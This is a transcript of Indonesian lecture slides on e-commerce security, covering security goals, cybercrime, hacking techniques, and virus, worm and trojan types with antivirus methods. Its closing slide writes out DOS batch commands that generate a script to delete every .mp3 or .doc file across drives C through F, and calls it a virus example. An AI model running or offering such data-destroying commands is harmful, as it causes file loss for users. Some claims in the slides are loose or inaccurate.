Download - Azzahra e commerce 4

Transcript

DIAGRAM E-COMMERCE OTOMATIS

Aspek Keamanan E – Commerce KONSEP DASAR KEAMANAN E-COMMERCE

COMPUTER CRIME

adalah istilah yang mengacu kepada aktivitas kejahatan dengan komputer atau jaringan komputer menjadi alat, sasaran atau tempat terjadinya kejahatan.

Termasuk ke dalam kejahatan dunia maya antara lain adalah Penipuan dan pemalsuan (kartu Kredit,lelang,identitas, dll) Pencurian dataPengiriman virus

Pornografi,

dll

Hal – Hal yang menyebabkan Bekembangnya KEJAHATAN ON LINE

1. Aplikasi bisnis berbasis teknologi informasi & jaringan semakin meningkat

2. Desentralisasi server 3. Transisi dari single vendor ke Multi vendor4. Meningkatnya kemampuan pemakai di bidang

komputer5. Mudahnya memperoleh sofware untuk menyerang

komputer dan jaringan6. Kesulitan dari penegak hukum untuk mengejar pelaku

di dunia komputer & telekomunikasi

INFORMATION SECURITY

– Keamanan Informasi merupakan bagian terpenting dari E-Commerce

– Sistem Keamanan informasi memiliki empat macam tujuan yang sangat mendasar :

1. Confidentiality 2. Intergrity 3. Availability 4. Authentication

Confidentiality

• Kerahasiaan, usaha menjaga informasi dari orang yang tidak berhak

• Menjamin apakah informasi yang dikirim tersebut tidak dapat dibuka atau diketahui oleh orang yang tidak berhak

Integrity

• Menjamin pengguna yang sah bisa mengakses informasi sumber miliknya sendiri

• Orang yang tidak berhak ditolak untuk mengakses informasi

• Enkripsi dan Digital Signature

Integrity menjamin konsistensi data, informasi tidak boleh diubah seijin pemilik informasi

1. Keaslian Data 2. Keutuhan Data 3. Penduplikatan data

Availability

• Ketersediaan Informasi ketika dibutuhkan• Sistem Infomasi yang diserang atau dijebol dapat

menghambat informasi ketika dibutuhkan• DoS (Denial of service attack), • Pembanjiran permintaan pada server• Mailbomb

Authentication/Legitimate Use

• Metode yang menyatakan bahwa informasi betul-betul asli

• Orang yang mengakses atau memberikan informasi betul spt yang dimaksud

• Keaslian Dokumen : Watermaking, digital signature

Aspek Keamanan E-Commerce

Dua aspek berkaitan dengan keamanan E-commerce :

1. Acces Control 2. Non-repudiation

Access Control

• Pengaturan akses kepada informasi • Mekanisme Klasifikasi Pengguna

( Public,Privat,Confidental, top secret User (guest atau admin))

Ada 3 hal access kontrol :

1. What You Have (Kartu Id, ATM) 2. What You Know (Pasword,PIN) 3. What You Are (Sidik Jari, biometric)

Non Repudiation

Seseorang tidak menyangkal telah melakukan transaksi

Digital Signature Certifiates (tanda tangan digital), Tekonologi Kriptografi (merubah huruf menjadi simbol tertentu)(SSL Server (Enkripsi Secure Socket Layer) melindungi komunikasi transaksi kartu kredit

2 BIDANG UNTUK PENERAPAN DAN MENCAPAI TEKNOLOGI KEAMANAN

INFORMASI

1. Sistem Keamanan Komunikasi Merupakan perlindungan terhadap informasi

ketika dikirim dari sebuah sistem ke sistem lainnya

2. Sistem Keamanan Komputer Perlindungan terhadap sistem informasi komputer

itu sendiri meliputi keamanan perangkat lunak sistem operasi, keamanan terhadap perangkat lunak manajemen database komputer

CONTOH SERVICE KEAMANAN MEKANISME NON ELEKTONIK

• Authentication > Indentitas diri,foto• Access Control >Checkpoint guard • Confidentiality > Surat tersegel, Tinta yang tidak

terlihat• Intergrity > Data Tidak dpt dihapus,Hologram • Non-Repudiation > Tanda tangan Notaris, Surat

teregistrasi

FAKTOR KEAMANAN LAINNYA

Keamanan secara fisik • Penjaga keamanan, pintu terkunci, sistem kontrol dll• Keamanan personal• Kepribadian & tanggung jawab personal• Keamanan administratif• Kontrol terhadap perangkat lunak yang digunakan• Keamanan media yang digunakan • Media security terhadap media penyimpanan

> Security Policy • Faktor yang mendasar untuk keamanan

komunikasi E-commerce

> Authorization• Kebijakan keamanan yang digunakan,

merupakan set aturan dalam security domain

OTORISASI BAGIAN DARI SECURITY POLICY BERUPA PEMBERIAN KEGIATAN SECARA HUKUM UNTUK

MELAKUKAN SEGALA AKTIVITAS

• Accountability (Akses personal security)• A Threat (Ancaman yang tidak diinginkan)• An Attack

(Serangan dari ancaman (pasive attack, active attack)

• Safeguards Pengamanan kontrol fisik, mekanisme,kebijakan & prosedur melindungi informasi

• VulnerabilitiesLubang celah kemanan yang mudah ditembus

• Risk Analysis (Resiko Kerugian)

THREATS (ANCAMAN)

• System Penetration Orang yang tidak berhak mendapat akses ke sistem

• Authorization Violation Pelanggaran penyalahgunaan wewenang legal

• PlantingFuture attack, serangan kesistem yang tidak dilakukan secara langsung

• Communications Monitoring

• Denial of serviceAkses service user dihalangi

• ReduptionPenolakan terhadap sebuah aktifitas transaksi

Cyber Crime 1. Typosite,

membuat situs palsu yang penampilannya sama dengan situs aslinya,dengan harapan korban salah mengetik alamat bank resmi sehingga melakukan transaksi online banking di situs miliknya.

2. Key Logger, sebuah cara mengunci tombol keyboard dengan menggunakan program logger tertentu sehingga jejak pengguna setiap kali memencet tombol dapat terekam di komputer.

3. Cookies/Pathfinder, sebuah program yang bisa menampilkan kembali apa saja yang telah diketik seseorang (mirip dengan key logger).

4. Magnetic Card Reader, suatu alat yang bisa digunakan untuk membaca informasi apa saja pada sebuah kartu, baik kartu kredit, debet, maupun cash. Biasanya terjadi pada orang yang kehilangan kartunya.

Typo Site

key logger

Kejahatan Online Banking

VIRUS

Kejahatan Kartu Kredit

Cara Menyadap PIN

MASA DEPAN E – COMMERCE

Perkembangan E-Commerce di IndonesiaDi dalam perkembangan E-Commerce di Indonesia, memiliki tantangan - tantangan, diantaranya yaitu :

1. Kultur

• Masyarakat Indonesia, yang masih belum terbiasa dalam berbelanja dengan katalog.

• Masih harus melihat secara fisik atau memegang barang yang akan dijual.

• Masih senang menawar harga yang dijual.

2. Kepercayaan• Kepercayaan antara penjual dan pembeli masih tipis.• Kepercayaan kepada pembayaran elektronik masih kurang.• Penggunaan masih jarang.

MASA DEPAN E-COMMERCE ? Tampaknya e-commerce mempunyai masa depan yang cerah. Jika berbagai detail dari perdagangan online ini dapat diselesaikan maka bukan mustahil e-commerce dan Internet akan mengubah struktur dunia usaha secara global. Dengan perkembangan masyarakat virtual yang demikian besar - banyak orang yang berpartisipasi dalam berbagai interest group online - memperlihatkan pergeseran paradigma dari kekuatan ekonomi yang bertumpu pada pembuat / manufacturer ke kekuatan pasar.

Paling tidak demikian yang dilihat oleh John Hagel

dan Arthur Armstrong, sepasang analis dari McKinsey http://www.mckinsey.com/ sebuah perusahaan konsultan manajemen internasional.

ParentsPlace http://www.parentsplace.com/ merupakan tempat pertemuan para orang tua yang akhirnya memberikan kesempatan pada vendor-vendor kecil untuk mencapai pelanggan potensial mereka untuk produk yang sangat spesifik seperti makanan bayi dan shampo.

BASIS IMPLEMENTASI E-COMMERCE BAGI WIRAUSAHAWAN

• Mempunyai produk untuk dijual.• Mempunyai moralitas dan motivasi diri : jujur,

positif, sabar, komprehensif, rasional, energik, visi dan misi.

• Harus mempunyai infrastruktur internet, komputer dan website (gratis/berbayar).

• Manajemen administrasi dan akutansi : punya metode pembayaran melalui bank, paypal, western union, dll, sistem purchase order, invoicing, receipt dan good accounting.

• Mempunyai strategi Customer Support. Berguna untuk proses transaksi dan layanan after sales.

• Manajemen Quality Control, Packing dan Ekpedisi. Untuk kontrol kualitas produk, pengemasan dan pengiriman kepada pembeli.

• Mempunyai strategi Internet Marketing (IM). Berguna untuk marketing, public relation dan branding.

• Mempunyai jiwa spiritual dan sosial.

KEAMANAN DAN

PENGENDALIAN DI

INTERNET

KEAMANAN DAN

PENGENDALIAN DI

INTERNET

Akses

• Fokus dari masalah akses adalah pada penyediaan akses untuk semua kalangan.

• Teknologi informasi diharapkan tidak menjadi halangan dalam melakukan pengaksesan terhadap informasi bagi kelompok orang tertentu.

Keamanan

• Perlindungan terhadap informasi dan sistem informasi dari akses, penggunaan, pengungkapan, kerusakan, gangguan, atau modifikasi yang tidak sah.

• Ancaman terhadap sistem informasi dibagi menjadi 2 yaitu :–Ancaman aktif–Ancaman pasif

Keamanan

• Ancaman aktif meliputi kecurangan, penipuan dan kejahatan terhadap komputer.

• Ancaman pasif meliputi kegagalan sistem, kesalahan manusia, dan bencana alam.

Teknik hacking - Denial of service

Teknik ini dilakukan dengan cara membuat permintaan yang sangat banyak terhadap suatu situs sehingga sistem menjadi macet, dan kemudian dengan mencari kelemahan sistem, pelaku melakukan serangan terhadap sistem.

Teknik hacking - Sniffer

• Teknik ini dilakukan dengan membuat program yang dapat melacak paket data seseorang ketika paket tersebut melintasi internet, menangkap password atau isinya.

Teknik hacking - Spoofing

Pemalsuan alamat email atau web dengan tujuan menjebak pemakai agar memasukkan informasi yang penting seperti password atau nomor kartu kredit.

Teknik hacking - Logic bomb dan time bomb

Program yang beraksi karena dipicu oleh suatu kejadian atau setelah selang waktu tertentu.

Teknik hacking - Virus• Program komputer yang dapat menggandakan

atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain.

• Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup.

• Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.

• Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer tetapi dapat mengakibatkan kerusakan dengan cara memuat program yang memaksa over process ke perangkat tertentu.

• Efek negatif virus komputer adalah memperbanyak dirinya sendiri, yang membuat sumber daya pada komputer (seperti penggunaan memori) menjadi berkurang secara signifikan.

• Hampir 95% virus komputer berbasis sistem operasi Windows. Sisanya menyerang Linux/GNU,  Mac, FreeBSD, OS/2IBM, dan Sun Operating System.

• Virus yang ganas akan merusak perangkat keras.

KRITERIA VIRUS KOMPUTER

1. Kemampuan untuk mendapatkan informasi

2. Kemampuannya untuk memeriksa suatu program

3. Kemampuannya untuk menggandakan diri dan menularkan

4. Kemampuannya melakukan manipulasi

5. Kemampuannya untuk menyembunyikan diri

• KEMAMPUAN UNTUK MENDAPATKAN INFORMASI

Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory, agar dia dapat mengenali program program apa saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, terus memilahnya dengan mencari file-file yang bisa ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan pengumpulan data dan menaruhnya di RAM, sehingga apabila komputer dimatikan semua data hilang tetapi akan tercipta setiap program bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus .

• KEMAMPUAN MEMERIKSA SUATU PROGRAM

Suatu virus juga harus bisa untuk memeriksa suatu program yang akan ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum, karena jika sudah terinfeksi, maka dia akan percuma menularinya 2 kali. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program. Yang umum dilakukan oleh virus adalah memiliki/ memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut . Contoh penandaan adalah misalnya memberikan suatu byte yang unik disetiap file yang telah terinfeksi.

• KEMAMPUAN UNTUK MENGGANDAKAN DIRI

Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari program lainnya. Suatu virus apabila telah menemukan calon korbannya (baik file atau program) maka ia akan mengenalinya dengan memeriksanya, jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari dengan cara menuliskan byte pengenal pada program/file tersebut, dan seterusnya mengcopikan/menulis kode objek virus diatas file/program yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk menulari/ menggandakan dirinya adalah:

a. File/Program yang akan ditulari dihapus atau diubah namanya, kemudian diciptakan suatu file menggunakan nama itu dengan menggunakan virus tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus).

b. Program virus yang sudah di eksekusi/load ke memori akan langsung menulari file-file lain dengan cara menumpangi seluruh file/program yang ada.

• KEMAMPUAN MENGADAKAN MANIPULASI

Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file/program. Isi dari suatu rutin ini dapat beragam mulai dari yang teringan sampai pengrusakan. Rutin ini umumnya digunakan untuk memanipulasi program ataupun mempopulerkan pembuatnya. Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System) , sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi.

• KEMAMPUAN MENYEMBUNYIKAN DIRI

Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana. Langkah-langkah yang biasa dilakukan adalah:

- Program asli/virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai.

- Program virus diletakkan pada Boot Record atau track yang jarang diperhatikan oleh komputer

itu sendiri.

- Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak berubah ukurannya.

- Virus tidak mengubah keterangan waktu suatu file, dll. 

• Dormant phase ( Fase Istirahat/Tidur )

Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini.

• Propagation phase ( Fase Penyebaran )

Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap program yang terinfeksi akan menjadi hasil “klonning” virus tersebut (tergantung cara virus tersebut menginfeksinya).

SIKLUS HIDUP VIRUS SECARA UMUM MELALUI 4 TAHAP

• Trigerring phase ( Fase Aktif )

Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant phase.

• Execution phase ( Fase Eksekusi )Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb.

JENIS-JENIS VIRUS

Cacing computer atau juga di sebut worm (bahasa Inggris: computer worm atau worm) dalam keamanan komputer, adalah sebuah program komputer yang dapat menggandakan dirinya secara sendiri dalam sistem komputer. Sebuah worm dapat menggandakan dirinya dengan memanfaatkan jaringan (LAN/WAN/Internet) tanpa perlu campur tangan dari user itu sendiri. Worm tidak seperti virus komputer biasa, yang menggandakan dirinya dengan cara menyisipkan program dirinya pada program yang ada dalam komputer tersebut, tapi worm memanfaatkan celah keamanaan yang memang terbuka atau lebih dikenal dengan sebutan vulnerability. Beberapa worm juga menghabiskan bandwidth yang tersedia. Worm merupakan evolusi dari virus komputer.

Worm - Menduplikatkan dirinya sendiri pada harddisk. Ini membuat sumber daya komputer (Harddisk) menjadi penuh akan worm itu.

Worm

Hanya ada satu cara untuk mengatasi worm yaitu dengan menutup celah keamanan yang terbuka tersebut, dengan cara meng-update patch atau Service Pack dari operating sistem yang digunakan dengan patch atau Service Pack yang paling terbaru.

Virus komputer memang dapat menginfeksi berkas-berkas dalam sebuah sistem komputer, tapi worm dapat melakukannya dengan lebih baik. Selain dapat menyebar dalam sebuah sistem, worm juga dapat menyebar ke banyak sistem melalui jaringan yang terhubung dengan sistem yang terinfeksi. Beberapa worm, juga dapat mencakup kode-kode virus yang dapat merusak berkas, mencuri dokumen, e-mail, atau melakukan hal lainnya yang merusak, atau hanya menjadikan sistem terinfeksi tidak berguna.

Beberapa contoh dari worm adalah sebagai berikut:

• ADMw0rm: Worm yang dapat melakukan eksploitasi terhadap layanan jaringan Berkeley Internet Name Domain (BIND), dengan melakukan buffer-overflow.

• Code Red: Worm yang dapat melakukan eksploitasi terhadap layanan Internet Information Services (IIS) versi 4 dan versi 5, dengan melakukan serangan buffer-overflow.

• LoveLetter: Worm yang menyebar dengan cara mengirimkan dirinya melalui e-mail kepada semua akun yang terdaftar dalam Address Book Microsoft Outlook Express/daftar kontak dalam Microsoft Outlook dengan cara menggunakan kode Visual Basic Script (VBScript).

• Nimda• SQL-Slammer

Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Tujuan dari Trojan adalah memperoleh informasi dari target (password, kebiasaan user yang tercatat dalam system log, data, dan lain-lain), dan mengendalikan target (memperoleh hak akses pada target).

Trojan - Mengambil data pada komputer yang telah

terinfeksi dan mengirimkannya pada pembuat trojan itu sendiri.

Trojan Horse

Cara Kerja:

Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus komputer atau worm karena dua hal berikut:

Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik, sementara virus komputer atau worm bertindak lebih agresif dengan merusak sistem atau membuat sistem menjadi crash.

Trojan dikendalikan dari komputer lain (komputer attacker).

Cara Penyebaran:

Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna; seperti halnya dalam Perang Troya, para prajurit Sparta bersembunyi di dalam Kuda Troya yang ditujukan sebagai pengabdian kepada Poseidon. Kuda Troya tersebut menurut para petinggi Troya dianggap tidak berbahaya, dan diizinkan masuk ke dalam benteng Troya yang tidak dapat ditembus oleh para prajurit Yunani selama kurang lebih 10 tahun perang Troya bergejolak

Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM dalam sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain) yang dimasukkan ke dalam sistem yang ditembus oleh seorang cracker untuk mencuri data yang penting bagi pengguna (password, data kartu kredit, dan lain-lain). Trojan juga dapat menginfeksi sistem ketika pengguna mengunduh aplikasi (seringnya berupa game komputer) dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi tersebut dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan.

• Backdoor

 - Hampir sama dengan trojan. Namun, Backdoor bisanya menyerupai file yang baik-baik saja. Misalnya game.

• Spyware

 - Spyware merupakan turunan dari adware, yang memantau kebiasaan pengguna dalam melakukan penjelajahan Internet untuk mendatangkan "segudang iklan" kepada pengguna. Tetapi, karena adware kurang begitu berbahaya (tidak melakukan pencurian data),  spyware melakukannya dan mengirimkan hasil yang ia kumpulkan kepada pembuatnya (adware umumnya hanya mengirimkan data kepada perusahaan marketing).

• Rogue - merupakan program yang meniru program 

antivirus dan menampilkan aktivitas layaknya antivirus normal, dan memberikan peringatan-peringatan palsu tentang adanya virus. Tujuannya adalah agar pengguna membeli dan mengaktivasi program antivirus palsu itu dan mendatangkan uang bagi pembuat virus rogue tersebut. Juga rogue dapat membuka celah keamanan dalam komputer guna mendatangkan virus lain.

• Rootkit

 - Virus yang bekerja menyerupai kerja sistem komputer yang biasa saja.

• Polymorphic virus 

- Virus yang gemar berubah-ubah agar tidak dapat terdeteksi.

• Metamorphic virus

 - Virus yang mengubah pengkodeannya sendiri agar lebih sulit dideteksi.

• Virus ponsel

 - Virus yang berjalan di telepon seluler, dan dapat menimbulkan berbagai macam efek, mulai dari merusak telepon seluler, mencuri data-data di dalam telepon seluler, sampai membuat panggilan-panggilan diam-diam dan menghabiskan pulsa pengguna telepon seluler.

• VIRUS MAKRO

Jenis Virus ini pasti sudah sangat sering kita dengar. Virus ini ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila aplikasi pembentuknya dapat berjalan dengan baik,

maksudnya jika komputer dengan OS Windows 7 dapat menjalankan aplikasi ms. words, maka virus ini bekerja pada komputer bersistem operasi Windows 7

KATEGORI VIRUS KOMPUTER

Contoh virus:

- Variant W97M, misal W97M.Panther Panjang 1234 bytes, akan menginfeksi NORMAL.DOT dan menginfeksi

dokumen apabila dibuka.

- WM.Twno.A;TW, panjang 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya berekstensi *.DOT dan *.DOC, dll.

• VIRUS BOOT SECTOR

Virus Boot sector ini sudah umum sekali menyebar.Virus ini dalam menggandakan dirinya akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan di load kememori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar keseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain selain drive c).

Contoh virus :

I. Varian virus wyx ex: wyx.C(B), menginfeksi boot record dan floopy; panjang : 520 bytes,

karakteristik : memory resident dan terenkripsi.

II. Varian V-sign, menginfeksi master boot record; panjang 520 bytes; karakteristik: menetap di memori (memory resident), terenkripsi, dan polymorphic)

III. Stoned.june 4th/ bloody, menginfeksi Master boot record dan floopy; panjang 520 bytes; karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan pesan"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali.

• STEALTH VIRUS

Virus ini akan menguasai tabel tabel interupt pada DOS yang sering kita kenal dengan “Interrupt interceptor”. Virus ini berkemampuan untuk mengendalikan instruksi instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya baik secara penuh ataupun ukurannya. Contoh virus :

- Yankee.XPEH.4928, menginfeksi file *.COM dan *.EXE ; panjang 4298

bytes; karakteristik: menetap di memori, ukuran tersembunyi, memiliki pemicu.

- WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth dimasukkan pula disini), menginfeksi floopy an motherboot record; panjang 520 bytes; menetap di memori; ukuran dan virus tersembunyi.

- Vmem(s), menginfeksi file file *.EXE, *.SYS, dan *.COM; panjang fie 3275 bytes; karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi dll.

• POLYMORPHIC VIRUS

Virus ini Dirancang buat mengecoh program antivirus, artinya virus ini selalu berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah strukturnya setiap kali selesai menginfeksi file/program lain. Contoh virus: 

- Necropolis A/B, menginfeksi file *.EXE dan *.COM; panjang file 1963 bytes; karakteristik: menetap di memori,

ukuran dan virus tesembunyi,terenkripsi dan dapat berubah ubah struktur.

- Nightfall, menginfeksi file *.EXE; panjang file 4554 bytes; karakteristik : menetap di memori, ukuran dan virus tersembunyi,memiliki pemicu, terenkripsi dan dapat berubah-ubah struktur dll.

• VIRUS FILE/PROGRAM

Virus ini menginfeksi file file yang dapat dieksekusi langsung dari sistem operasi, baik itu file application (*.EXE), maupun *.COm biasanya juga hasil infeksi dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya.

• MULTI PARTITION VIRUS

Virus ini merupakan gabungan dari Virus Boot sector dan Virus file: artinya pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-file *.EXE dan juga menginfeksi Boot Sector.

Cara mengatasi

• Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan Software antivirus.

• Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer.

• Virus komputer ini dapat dihapus dengan basis data (database/ Signature-based detection), heuristik, atau peringkat dari program itu sendiri (Quantum).

• Pendeteksian dengan menggunakan basis data virus signature (virus signature database):

• Cara kerja antivirus ini merupakan pendekatan yang banyak digunakan oleh antivirus tradisional, yang mencari tanda-tanda dari keberadaan dari virus dengan menggunakan sebagian kecil dari kode virus yang telah dianalisis oleh vendor antivirus, dan telah dikatalogisasi sesuai dengan jenisnya, ukurannya, daya hancurnya dan beberapa kategori lainnya.

• Pendeteksian dengan melihat cara bagaimana virus bekerja: Cara kerja antivirus seperti ini merupakan pendekatan yang baru yang dipinjam dari teknologi yang diterapkan dalamIntrusion Detection System (IDS).

• Cara ini sering disebut juga sebagai Behavior-blocking detection. Cara ini menggunakan policy (kebijakan) yang harus diterapkan untuk mendeteksi keberadaan sebuah virus.

• Jika ada kelakuan perangkat lunak yang "tidak wajar" menurut policy yang diterapkan, seperti halnya perangkat lunak yang mencoba untuk mengakses address book untuk mengirimkan e-mail secara massal terhadap daftar e-mail yang berada di dalam address book tersebut (cara ini sering digunakan oleh virus untuk menularkan virus melalui e-mail), maka antivirus akan menghentikan proses yang dilakukan oleh perangkat lunak tersebut.

Contoh Program Virus di DOS Prompt

Yang perlu Anda ketikkan dalam DOS adalah:• echo for %%p in (C:\hack) do del *.mp3

%0 %%p:>virusdot.bat

• Maka akan muncul seekor virus yang bernama virus.dot dalam folder yang aktif.

• virus bekerja dengan menghapus semua file MP3 yang ada di dalamnya. Termasuk virus itu sendiri menghilangkan dirinya, untuk menghapus jejak.

• Apabila dimodifikasi supaya virus tersebut dapat menghapus dalam semua drive, bentuk syntax-nya adalah:

• echo for %%p in (C D E F) do del *.mp3 %0 %%p:>virusdot.bat

• Nanti, virus akan menyusup ke drive C, D, E, dan F untuk menghapus file MP3.

• Apabila berniat jenis file tertentu, katakanlah file dokumen (DOC), syntax-nya menjadi:

• echo for %%p in (C D E F) do del *.doc %0 %%p:>virusdot.bat

TERIMA KASIH